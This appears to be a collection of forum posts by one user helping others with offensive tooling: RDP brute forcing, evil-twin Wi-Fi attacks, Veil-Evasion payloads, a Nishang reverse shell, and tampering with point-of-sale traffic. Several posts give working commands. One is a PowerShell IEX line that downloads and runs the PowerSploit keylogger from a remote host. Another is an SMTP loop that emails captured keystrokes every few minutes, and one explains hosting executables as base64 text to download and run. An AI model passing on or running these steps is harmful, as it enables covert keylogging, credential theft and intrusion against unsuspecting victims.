PoSHMagiC0de

HTC-Hydra can do a bruteforce on RDP. Of course if common practice is used there shouldn't be an exposed RDP unless behind a RDP gateway. Even if still if they follow some security, you will most likely lock the account out which will ruin the rest of your attack. If not, Hydra can brute it with a wordlist, you will have to follow the examples and lower the thread count though or you will DOS the service. Other than that if they did not apply a cert you can use the self signed cert you see to get the machine name inside the network and domain name. If CredSSPSupport is off you can get the graphical desktop and see what Windows they are running.

Fluxion uses xterm to open multiple windows so you need a desktop environment for that to happen. It is some fancy scripting that uses aircrack for recon to assist in target select, MDK3 as an option for deauthing, cowpatty as an option to verify handshakes, aircrack or hostapd for AP, isc-dhcp for dhcp on the ap, DNS spoof to spoof DNS for captive portaling and several other modules like php and stuff to serve the captive portal. I actually found it faster to get the handshakes outside of fluxion to use for fluxion's captive portal rather than use the snooper...well at least in the recent updates. Probably can remove the need for the desktop environment by having it run each of its task windows as background tasks instead and keep track of their pid to kill when the user stops the attack. Maybe to screens too? I think the reason for all the windows (which I do find helpful) is so you can monitor all the modules and see what is going on in case something is not working.

Instead of just giving the answer, the answer is the second answer here for handing binary files. I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there. https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64 The premise is this. You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host. You Posh script should download that contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it. If the file was text like a script you would user [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64. If you plan on using the .NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in. "$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.

Welp, you can always get a vps and host it. Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file. Download that string, convert back to bytes and then write to drive or memory and execute.

You might have to apt install python-crypto. If the pip install did not get it then it is an apt package you will need.

It is from Nishang. Here is the link to a git that shows 2 different ones. believe he is using the bottom one. Change IP and port. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

Oh crap, I didn't see you had ParrotOS installed. Yeah, prepare for the pain. I just saw Kali and figured you had Kali. What is hurting you here is Firejail. I used to run ParrotOS for about a year and then dropped it because they are really focused on anonymity which a lot of times break the pen tools. To fix certain pen tools and veil you have two choices. One, you can run veil tell firejail to not jail it (I forgot the commandline for that, might have to ask on the ParrotSec forums) or do what I did and removed firejail with apt remove --purge firejail Once you do that, you will have to redo veil but I would remove the git one if you got it just because the apt one didn't work. If you prefer the git one and have it rerun its installer again after you took care of firejail either by running the installer with the commandline to not firejail it or after you removed firejail.

Okay, on my VM I did not have veil-evasion on I did the following and veil works. dpkg --add-architecture i386 apt update apt upgrade apt dist-upgrade apt autoremove reboot -n #above I updated everything because my VM was behind but made sure I had the i386 architecture added first. #after reboot and logon. apt update apt install wine apt install veil-evasion veil I told it to install with "Y" I reinstalled all the Windows apps for python, ruby, etc...overwriting when I had to. When done I was in veil and I created a regular https payload using phyperion and default pyinstaller. It got done with no errors. If you have not done so, make veil reinstall/reset so you can reinstall the dependencies. If having issues resetting. then apt remove --purge veil-evasion and then re apt install it. Now if you installed veil from git, well, you will have to figure out how to completely remove it to reinstall it or the one from apt.

Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device. So, above I was trying to have you just jump on your test machine. Run powershell and just use the two line commands I put out. The first will download and launch get-keystokes function to memory for use. Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong but atleast you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work. Now if it does then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works.

Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. The default if ran on its own with no parameters it should create a key.log. in the temp folder. The line below in the payload.txt changes that to key.txt if ran with it. STRING Get-Keystrokes -LogPath $env:temp\key.txt So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run powershell and then run each line. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') #For Default path. Get-Keystrokes #To place it on your desktop do and look for keylog.txt to popup. Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it or closing the Powershell window will do the same I believe. I have to test. I do not have my test machine up to test so going off of what I read inside all the scripts. <ight want to check your AV too. The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.

I haven't used Veil-Evasion in a bit. I will give it an install and run this week sometime to see if something has changed since the last time I installed it.

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Where ever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. if you get no key.txt or no stuff in it then the keylogger is not logging.

I had issues in the past with Veil. One thing you have to make sure of is you add the i386 architecture to your apt: dpkg --add-architecture i386 Next install wine. You want to make sure wine64 and win32 installs. Next, rerun the installer for Veil to make sure everything goes in fine and then try your payload creation again. I would also watch the install carefully and look for any errors. For those I had to install the package myself. If a pip install failed, you may have to apt-get the package before running pip.

He is looking to make the original AP vanish from wireless list on victim's device so only his fake ap with same name is there. Essentially blocking all probe responses from the victim's AP and beacons. Changing your mac will not do that.

Not quietly. There is no way to stop the beacon of the real access point unless you jam the channel/frequency it is on which is very loud.

Just guessing but the issue might be on this line. I don't use smtpclient in Powershell but instead use send-mailmessage. But...the issue with the smtpclient in the script maybe this and the correction that may need to happen. while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} should be maybe??? while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} The attachment of the mailmessage object takes an attachment object.

You took an array and casted it to a string. Expect spaces whenever you do that. Correct way to handle this is to use "join". $password = -join ($characters[$random]) if you are looking for a random password generator, here is a oneliner. $password = -join (33..126 | ForEach-Object {[char]$_} | Get-Random -Count 20) The count is your total number of characters in password you want. The 33..126 is the int values for all printable ascii values..well the ones that are in series. You can of course extend this in a loop and then test to see if it meets your complexity after each run until it matches.

from 4 iterations it is base64 decoded three times. I suspect you base64 decode it 13 times will get you answer.

So, my work laptop began a few years ago running Windows with Kali and/or some other linux distro in virtual box. I do no gaming on this laptop so decided since I do more in Linux and only needed Windows for a few things that are Windows only like Office, etc so removed the Windows license from my laptop and redid with a dual boot. 1 is for Mint, the other is for Kali. Both encrypted. Where did Windows go? It is a virtual box now. Funny thing, Windows as a VM runs better than it did bare metal on my laptop..lol. What I learned. Kali has some issues as a VM, especially when you get to some of the heavier attacks like yersinia and stuff. I have had the VM just close out sometimes. As a bare metal it works fine.

So, in a WIndows AD environment, learning Powershell is king for remoting. Now, for the BB being used, I have done this a few times. Will have to say you will still need to prep all the stuff on the BB for the software you are installing. Example is if you want it to click through prompts then you will need a test rig to see what all those prompts are and what is needed via quack commands to click them all. All in all, you may end up putting in as much work the BB version as you would for the PDQDeploy package. Difference is the PDGDeploy package will reduce the number of machines you have to physically visit (only visit those PDQDeploy failed on). PDQDeploy is pretty cool if the installation you are pushing has a silent option. Of course you could do it with Powershell too. If WinRM is enabled it gets easy since you can retrieve feedback from the session. If not and you go wmi then you will need a way to get feedback from the remote machine since WMI just tells you it ran your command and that is it so your script will need to drop its output somewhere either a SMB path or maybe a rest service you build on your admin box. I have inherited a lot of sketchy AD domains. I usually, after I find out the needs, I go through and clean it up. Even gone so far, if the previous tech totally trash the AD domain, building a new domain next to the old and getting stuff recreated in the new domain. Rarely had to do that but have ran across one I did..it was a 2003 domain and complete garbage.

Nah, I am lazy. Tag, someone else is it.

So, lets look at how a franchise network "should" look like. I have cleaned up a few. First of all, most franchises take credit card payments. This means they have the be PCI compliant. This also means they get a questionnaire from the bank that handles their transactions for their machines every year. This questionnaire is filled out by their IT folks and covers things that need to be done. Pretty much you answer wrong on a question, you failed compliance and have to make it right before the deadline or they stop taking transactions for you. The questionnaire is dynamic meaning depending on how you answer one question may extend into more sub questions. It is a pain in the ass. I am glad the few sites I have cleaned up didn't use wifi POS devices as this gets more in depth. Anyway, the way they are done is you have APs that can serve 2 ssids. They all talk to a wifi server. The guest network always should only serve internet if you wish but not see anything internal. That can either be done by vlaning it or the more popular blocking all private subnets. Block subnets also makes it so each device cannot see each other and/or mess with each other. The staff one is still not on the POS network. That is for administration usually. The more that interacts with the POS network (Point of Sale, the machines that handle sales and credit card transactions) the more the questionnaire will want you to secure all those other machines. So, mostly those wifis are not going to point at their internal POS system. That is usually hidden and enterprise if is unless it is one of those small shops and they are using that Square app. I only say this because my donut shop I like to pickup from I happen to see they were on WEP still and their IPad using Square was using it. Talked to their IT guy (a family member hehe) and helped him fix that. Anyway, unless they are lying to their bank and severely negligent, that Staff wifi will only get you access to administration where you will only be able to get reports and stuff. Now, others may be different hehe. Now, if so happen you do have access to a POS network and the data is cleartext, you will not be able to see it just sitting their unless they are using hubs. :-P You are going to have to MiTM one of their devices and the server/mainframe. Lookup MiTM to learn about that. Anyway, if you do then you will see the traffic. You will not need to spoof a packet. You can inspect it and its payload and see what the formatting is for order placements. Just capture a bunch, see what they are. They are probably codes for the orders so you will need to decipher those. Maybe go in a order a few things and see what the codes are for those orders and then send your own. If the packet is specialized you can use python scapy to craft your own following the original packet's schema. if it is http then you may can use something like postman or Burp. Please don't ask me how to do all the above, that is a minibook I do not care to write.

I am trying to type this on phone so bear with me. That is normal. Keys are valid per tcp session, or per number of bytes sometimes. They are always per session which is not the same as your web session. Tcp sessions end when fin is sent, or rst sent. Pretty much you getting the page is a session. You submitting/posting is another session. Each request is a new session so new keys are built.

Here you go. https://github.com/catalyst256/MyJunk/blob/master/scapy-deauth.py

Sorry for the late response. Busy guy. Yeah, you shouldn't have to change the execution policy. I test all my scripts on restricted. Reason it should work is you are not (technically) running a script. The powershell line actually is an inline command so will run even with restricted policy. In the powershell one liners I am not running the other script but reading in the contents as a string and then running it as an expression. I looked through your steps i see you maybe missing 1 final step. Grab the script Invoke-SMBExfil.ps1 from my BBTPS project in my repo. I linked it in the thread above. The duckexfil uses that script to do its thing. So you need that DuckExfil.ps1 and Invoke-SMBExfil.ps1 in the same folder.